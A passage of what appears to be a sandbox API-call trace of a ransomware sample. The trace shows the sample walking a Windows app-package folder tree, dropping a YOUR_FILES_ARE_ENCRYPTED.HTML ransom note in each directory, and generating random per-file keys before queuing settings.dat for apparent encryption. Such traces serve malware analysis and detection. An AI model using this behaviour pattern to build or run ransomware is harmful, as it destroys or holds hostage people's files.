pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG1") returned 218 [0119.421] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0119.422] lstrlenW (lpString=".LOG1") returned 5 [0119.422] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0119.422] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x942565a7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x942565a7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x942565a7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315f070, dwReserved1=0x30f3dc8, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0119.422] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.422] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG2") returned 218 [0119.422] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0119.422] lstrlenW (lpString=".LOG2") returned 5 [0119.422] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0119.422] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x942565a7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x942565a7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x942565a7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315f070, dwReserved1=0x30f3dc8, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0119.422] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0119.422] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 223 [0119.422] GetProcessHeap () returned 0x600000 [0119.422] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.422] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\microsoft.windows.parentalcontrols_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.423] WriteFile (in: hFile=0x320, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.424] CloseHandle (hObject=0x320) returned 1 [0119.424] GetProcessHeap () returned 0x600000 [0119.424] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.424] GetProcessHeap () returned 0x600000 [0119.425] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.425] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9420a0c8, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9420a0c8, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9420a0c8, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0119.425] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0119.425] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 207 [0119.428] GetProcessHeap () returned 0x600000 [0119.428] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x698498 [0119.435] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Microsoft.Windows.ParentalControls_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\microsoft.windows.parentalcontrols_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0119.437] WriteFile (in: hFile=0x338, lpBuffer=0x698498*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x698498*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.438] CloseHandle (hObject=0x338) returned 1 [0119.438] GetProcessHeap () returned 0x600000 [0119.439] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x698498 | out: hHeap=0x600000) returned 1 [0119.440] GetProcessHeap () returned 0x600000 [0119.440] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.441] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bcf8c41, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bcf8c41, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bcf8c41, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0119.441] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.441] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\RoamingState") returned 110 [0119.441] GetProcessHeap () returned 0x600000 [0119.441] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.442] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\RoamingState" [0119.442] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\RoamingState\\*" [0119.442] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bcf8c41, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bcf8c41, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bcf8c41, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0119.443] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bcf8c41, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bcf8c41, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bcf8c41, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName="..", cAlternateFileName="")) returned 1 [0119.443] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bcf8c41, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bcf8c41, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bcf8c41, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName="..", cAlternateFileName="")) returned 0 [0119.443] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0119.443] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 140 [0119.443] GetProcessHeap () returned 0x600000 [0119.443] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.444] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0119.445] WriteFile (in: hFile=0x338, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.446] CloseHandle (hObject=0x338) returned 1 [0119.446] GetProcessHeap () returned 0x600000 [0119.446] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.446] GetProcessHeap () returned 0x600000 [0119.446] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.446] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bcf8c41, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd1f071, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd1f071, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0119.446] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.446] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings") returned 106 [0119.447] GetProcessHeap () returned 0x600000 [0119.447] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.447] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings" [0119.447] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\*" [0119.447] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bcf8c41, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd1f071, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x93186f59, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0119.449] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8bcf8c41, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd1f071, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x93186f59, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName="..", cAlternateFileName="")) returned 1 [0119.449] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bd1f071, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8bd1f071, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8bd1f071, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0119.449] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.449] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\roaming.lock") returned 119 [0119.449] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0119.449] lstrlenW (lpString=".lock") returned 5 [0119.449] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0119.449] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bd1f071, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x93291fd5, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x93291fd5, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0119.449] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.449] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\settings.dat") returned 119 [0119.449] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0119.449] lstrlenW (lpString=".dat") returned 4 [0119.449] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0119.449] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0119.449] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x214 [0119.450] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0119.450] GetProcessHeap () returned 0x600000 [0119.450] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0119.454] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="A1") returned 2 [0119.454] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="7C") returned 2 [0119.454] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="73") returned 2 [0119.454] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="4B") returned 2 [0119.454] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="20") returned 2 [0119.454] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="B7") returned 2 [0119.454] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="EE") returned 2 [0119.454] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="4C") returned 2 [0119.454] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="45") returned 2 [0119.454] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="53") returned 2 [0119.454] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="3F") returned 2 [0119.454] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="AC") returned 2 [0119.454] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="DB") returned 2 [0119.454] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="26") returned 2 [0119.454] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="7E") returned 2 [0119.454] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="71") returned 2 [0119.454] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="23") returned 2 [0119.454] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="BE") returned 2 [0119.454] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="CA") returned 2 [0119.454] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="A3") returned 2 [0119.454] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="0E") returned 2 [0119.454] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="FC") returned 2 [0119.454] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="48") returned 2 [0119.454] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="D5") returned 2 [0119.454] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="50") returned 2 [0119.454] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="7B") returned 2 [0119.454] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="C3") returned 2 [0119.454] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="0B") returned 2 [0119.454] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="1F") returned 2 [0119.454] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="0D") returned 2 [0119.455] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="F3") returned 2 [0119.455] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="57") returned 2 [0119.455] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\settings.dat" [0119.456] CreateIoCompletionPort (FileHandle=0x214, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.456] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0119.456] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x93186f59, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x93186f59, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x93186f59, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0119.456] StrStrIW (lpFirst="settings.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.456] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\settings.dat.LOG1") returned 124 [0119.456] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0119.456] lstrlenW (lpString=".LOG1") returned 5 [0119.456] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0119.456] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x93186f59, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x93186f59, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x93186f59, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0119.456] StrStrIW (lpFirst="settings.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.456] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\settings.dat.LOG2") returned 124 [0119.456] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0119.456] lstrlenW (lpString=".LOG2") returned 5 [0119.456] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0119.456] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x93186f59, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x93186f59, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x93186f59, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x30f3e84, dwReserved1=0x30f3dc0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0119.456] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0119.456] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 136 [0119.456] GetProcessHeap () returned 0x600000 [0119.456] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x698498 [0119.457] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.parentalcontrols_cw5n1h2txyewy\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0119.458] WriteFile (in: hFile=0x338, lpBuffer=0x698498*, nNumberOfBytesToWrite=0x3c00, 